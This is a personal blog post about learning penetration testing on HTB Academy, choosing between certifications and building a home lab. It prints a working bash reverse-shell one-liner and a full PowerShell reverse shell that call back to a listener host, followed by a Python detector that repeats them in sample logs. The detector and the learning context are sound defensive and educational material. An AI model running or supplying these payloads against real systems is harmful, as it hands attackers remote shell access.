Hacking Journey | Post 6

New week – New Focus.

Ok – last week I wanted to try a few Hack The Box machines, and it did not end well. I’m pretty good at enumeration now, but beyond finding the exploits, I am absolutely terrible at executing them. So – I decided to go back to the classroom, or in this case the academy.

Hack The Box Academy is a pretty good platform for learning; the only thing is that the answer flags can be pretty annoying sometimes. There are times when they ask simple things, for example in the Shells & Payloads section, where I put in the right answer but made the mistake of capitalizing it – so if you’re reading this or whatever, make sure you don’t use any capital letters, it might save you a headache.

To talk more about HTB Academy, I say it’s a pretty good platform because hacking, for the most part, isn’t conceptually based – beyond the normal concepts of security. The only thing that is conceptually based is perhaps the tools and the purpose behind those tools. On the blue side, implementation is a little bit easier, because the options are mainly drop-downs or documented as best practices somewhere. Whereas in hacking, it’s a “find your own path” kind of thing.

Pentest+ vs GPEN

I’ve been teetering on the idea of taking either Pentest+ by CompTIA or GPEN by SANS. The issue is that I’d be taking GPEN without the course, so I’d be going in blind for the most part. I’m familiar with CompTIA; in my opinion they’re the easiest format in terms of test taking, and they’re well documented in terms of third-party media, like Sybex, YouTube, etc… So – I think I’ll take Pentest+ to fill in the gap in my resume, even though I heavily desire GPEN, because I don’t think it’s worth taking the chance. The test itself is almost a grand, and there’s a higher risk of failure since the only way to really get the test source material is by buying into a class.

Anyways, to cover the weekend – my amazing wife organized just about everything in the garage, so it gave me space to set up my desktop workstation. I had been running a Moodle “test” server on it, but Rocky Linux, or more specifically SELinux, is pretty new to me, so I decided to scrap that and turn the machine into a hacking machine. I’ve installed openSUSE Tumbleweed as the main workstation (it was either that or Fedora – but I wanted to try Tumbleweed so…) and set up a KVM/QEMU virtual machine manager to later add on BlackArch. I know… unconventional. But I want to try new things. The only issue is that BlackArch kind of looks gross as a UI. They obviously don’t care, and rightfully so – their distribution is based on utility. Also, I think shell scripting BlackArch into an existing Arch Linux machine is a lot better, as you can have custom user profiles rather than the vanilla one. Little things I really shouldn’t care about, but I might still waste my time doing it.

Finished SQL Injection Fundamentals on HTB Academy

This one says it’s medium difficulty – but to be honest – it’s the easiest one I’ve done so far. It’s pretty straightforward, and I didn’t get any hiccups. I’m proceeding to the Shells & Payloads module, but… I’ve done about half of it before I did SQLi Fundamentals, and I don’t like the Windows portion. Nothing against HTB Academy, I just don’t understand why everything has to be so difficult on Windows. Like why can’t they just create a native SSH-like environment? The entire payload is like a paragraph long.

For instance, here’s a sample shell payload to get a reverse shell to a listening attacker on Linux:

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Here’s the same thing, but for PowerShell (the original line never assigned the TCPClient object to $client before using it; that assignment is fixed here):

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
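The flip side of that paragraph-long payload is that it is very loud in process-creation telemetry: the launch flags (-NoP, -W Hidden, -Exec Bypass), the raw TCPClient object and the iex on received data all sit in one command line, and the Linux one-liner leaves /dev/tcp/ in the command line too. The script below is an added example, not part of the HTB Academy module or the author's own code; it checks Sysmon/EDR-style process-creation lines for those indicators and flags a command line when two or more of them co-occur. The log format (timestamp host= pid= cmd=) and all sample lines are constructed for the example; the indicator list is taken from the two payloads shown above.

```python
"""Reverse-shell indicator check over constructed process-creation log lines.

Added example; not the post's or HTB Academy's code. The log format and the
sample lines are constructed, the indicators come from the two payloads above.
"""
import re

# (indicator name, regex) pairs. Each one corresponds to a fragment of either
# the bash or the PowerShell one-liner shown in the post.
INDICATORS = [
    ("bash /dev/tcp redirect", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("bash interactive shell with stdin/stdout redirect", re.compile(r"bash\s+-i\s+>&")),
    ("powershell hidden window", re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I)),
    ("powershell execution policy bypass", re.compile(r"-Exec(?:utionPolicy)?\s+Bypass", re.I)),
    ("powershell no profile", re.compile(r"-NoP(?:rofile)?\b", re.I)),
    ("raw TCP client object", re.compile(r"Net\.Sockets\.TCPClient", re.I)),
    ("invoke-expression on received data", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)),
]

# Constructed sample log: assumed format "<timestamp> host=<h> pid=<n> cmd=<command line>".
# Lines 1 and 2 carry the two payloads from the post (the PowerShell one shortened);
# lines 3 and 4 are benign commands that share a flag or a binary with them.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z host=web01 pid=4021 cmd=bash -i >& /dev/tcp/10.0.0.1/4242 0>&1",
    "2024-05-01T10:00:07Z host=ws07 pid=5120 cmd=powershell -NoP -NonI -W Hidden -Exec Bypass "
    "-Command $client = New-Object System.Net.Sockets.TCPClient(\"10.0.0.1\",4242);"
    "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)",
    "2024-05-01T10:00:09Z host=ws07 pid=5133 cmd=powershell -NoP -Command Get-Date",
    "2024-05-01T10:00:12Z host=web01 pid=4030 cmd=bash -c 'echo hello'",
]


def score_command_line(cmd: str) -> list[str]:
    """Return the names of every indicator that matches the command line."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def find_suspicious(lines, threshold: int = 2):
    """Return (timestamp, matched indicators) for lines with >= threshold hits.

    A single flag such as -NoP is common in legitimate admin scripts, so one
    indicator alone is not reported; the one-liners above trip several at once.
    """
    hits = []
    for line in lines:
        m = re.search(r"\bcmd=(.*)$", line)
        if not m:
            continue  # line does not follow the assumed format
        matched = score_command_line(m.group(1))
        if len(matched) >= threshold:
            hits.append((line.split()[0], matched))
    return hits


if __name__ == "__main__":
    for ts, matched in find_suspicious(SAMPLE_LOG):
        print(f"{ts}: {', '.join(matched)}")
```

The threshold is the design choice worth tuning: -NoP or -W Hidden on their own appear in plenty of scheduled tasks and installers, while the combination of a hidden window, a policy bypass, a raw socket and iex in one command line is what makes the PowerShell one-liner so recognisable. For a real deployment the same regexes map onto a Sysmon Event ID 1 CommandLine field or an EDR process-creation query.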

That’s ridiculous Windows. Why do you exist?

I’m going to sign off here. I’m thinking of starting a podcast – just because I’ve always wanted to do some type of audio/video content – but I don’t have the time to edit video anymore, so maybe just audio? Even still, it’d be stretching out my time. We’ll see.

By Diego Uy

Military dood, father of three, husband of a sexy momma. Network Administrator | Security enthusiast.
